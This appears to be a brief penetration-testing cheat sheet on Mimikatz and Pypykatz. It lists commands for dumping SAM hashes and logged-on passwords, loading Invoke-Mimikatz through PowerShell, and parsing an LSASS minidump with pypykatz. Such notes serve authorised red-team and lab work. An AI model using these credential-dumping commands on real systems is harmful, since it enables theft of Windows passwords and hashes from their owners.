Mimikatz

https://adsecurity.org/?page_id=1821

https://adsecurity.org/?p=556

http://woshub.com/how-to-get-plain-text-passwords-of-windows-users/

Options

Hash Dumping

lsadump::sam

Logged-On Passwords

sekurlsa::logonpasswords

Loading with Powershell

Import-Module .\Invoke-Mimikatz.ps1 
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz}

Pypykatz

  • From Kali with dump file

pypykatz lsa minidump lsass.DMP

Last updated